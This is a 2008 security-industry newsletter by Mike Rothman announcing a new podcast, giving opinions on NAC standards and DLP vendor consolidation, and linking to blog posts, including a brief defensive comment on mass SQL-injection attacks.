January 10, 2008 - Volume 3, #4
Good Morning:
I've been very resistant to doing a podcast. I'm not exactly sure why,
but I guess it's because I don't really listen to any - so I can't
imagine anyone would listen to mine. Honestly, I find most podcasts to
be crappy. They are long, drawn out, and generally a waste of time. Not
all, but most. I also don't have the patience to sit and listen to an
hour of anything, besides music.
I've heard more than once
that audio would be a great venue for me. I've been told my voice and
speaking style is "unique," which I always figured meant crappy. I do
lots of webcasts and try to relay a passion for what I do and I try to
be entertaining and kind of wacky. I know how boring it is to
listen to streamed audio over your lunch break, so the least I can do
is try to make it fun. But do I want to do this a couple of times a
month? That's the real question.
There is precedent for this. I've been doing a podcast and feature
article for eBizQ (called the Mike
Rothman Security Report [1], if you haven't heard it) for a
couple of months and it's been fun. It's trivial to record the audio on
my Mac (Skype + AudioHijackPro = easy) and the sound quality has proven
to be pretty good.
So I'm going to give podcasting a try. The first Pragmatic CSO podcast
will appear tomorrow. It will be short (10 minutes max), sweet and
hopefully entertaining. I'll still do the P-CSO newsletter, but
probably a bit less frequently (maybe once a month now).
What's going to be the point of the P-CSO podcast? Basically, I want to
pull nuggets out of the book and expand on those a bit. I also want to
interview practitioners, analysts, auditors, and other security-related
folks on topics of interest. But most of all, I want to have fun and
learn some new stuff. By talking with smart folks and honing my audio
skills, I'll be able to do both.
That's it for today. Lots to do, including figuring out all these
podcast details.
Have a great weekend.
The Dutch Couple image originally uploaded
by billbarber1 [2]
Technorati: Information
Security [3], CSO [4],
Security
Mike [5], Internet
Security [6]
 [7]The Pragmatic CSO: Available Now! Read the Intro and Get "5 Tips to be a Better CSO" www.pragmaticcso.com [8] |
Get Your Special Report: 6 Easy Steps to Protect Your Identity and get access to Security Mike's Portal today www.securitymike.com [9]  [10] |
Top Security News
Tech moves that matter - for good and bad. [11]"
Good isn't very interesting to me, so lo and behold, the #1 bad move in
2007? NAC. That's pretty funny. But it's actually a Joel Snyder induced
rant about NAC standards. Cisco's refusal to play nice with the TCG is
evidently a stupid move. Uh, not so much. What's in it for Cisco to
play along? Why do customers care? What value is a common NAC standard
going to provide? It's not like you are going to buy NAC gear from
multiple vendors. Microsoft had to play nice with TCG, their NAP stuff
isn't ready and won't be ready for most of this year. So that was a
Barney relationship. There is no benefit to Cisco for getting on board.
They'll have agents for all the operating systems and why would they
support heterogeneity? Not when there is too much riding on Cisco
everywhere.
Link to this [12]
this one on DLP consolidation [13] and
the market impact. It's actually more of a deal book for all the big
security vendors out there that don't have a DLP capability yet. Every
start-up is represented, so Cara (the author) must have worked really
hard to find all of these random vendors to provide comment. But
besides that minor entertainment value, we need to keep in mind that
the pace of consolidation is inconsistent with the underlying ECONOMIC
fundamentals of the DLP market. The big vendors are no longer waiting
for a market to really emerge before buying real estate. Thus every new
innovative security feature is destined to be assimilated before the
market ever gets off the ground. I guess that's a pretty obvious
conclusion to draw, but it will have an impact. There is a real
liability to being an early adopter now, knowing that sooner - rather
than later - whatever you buy will be subsumed into a bigger entity and
most likely screwed up.
Link to this [14]
The Laundry List
- Just what we need, another pundit talking about what's going to happen in security management in 2008. Ho hum. Even when the analyst is me. - Rothman column on 2008 Security Management [15]
- These aren't 5 immutable laws or anything, but this month's eBizQ feature is a primer on virtualization security. - The Mike Rothman Security Report [16]
Top Blog Postings
http://thurston.halfcat.org/blog/2008/01/04/let-the-metrics-begin/ [17]
Link
to this [18]
Litchfield did a while back [19]. Of
course, he didn't
leave anything malicious behind, but the concept is the same. The bad
guys build a script to find a bunch of SQL-injection vulnerable sites
(a scanner can do this, though it would need to be tuned a bit to not
raise a lot of suspicion), then they inject the malware and wait for
great stuff to happen. It's not necessarily self-propagating (like
SQL*Slammer), but it also shows that massive attacks are still quite
possible. What's a user to do? Run a scan against your Internet
accessible sites and make sure you are not vulnerable. Do pen tests
early and often. Also think about Firefox and NoScript, which would
protect client devices that navigate to these compromised websites.
http://www.terminal23.net/2008/01/mass_sql_injection.html [20]
Link
to this [21]
http://blogs.ittoolbox.com/security/adventures/archives/anatomy-of-a-physical-security-breach-21650 [22]
Link
to this [23]
http://sm-blog.securitymike.com [24]
Check out the
latest on
the Security Incite blog
http://blog.securityincite.com/ [25]
Read the
most recent Daily
Incite
http://securityincite.com/security-incite-rants/daily-incite [26]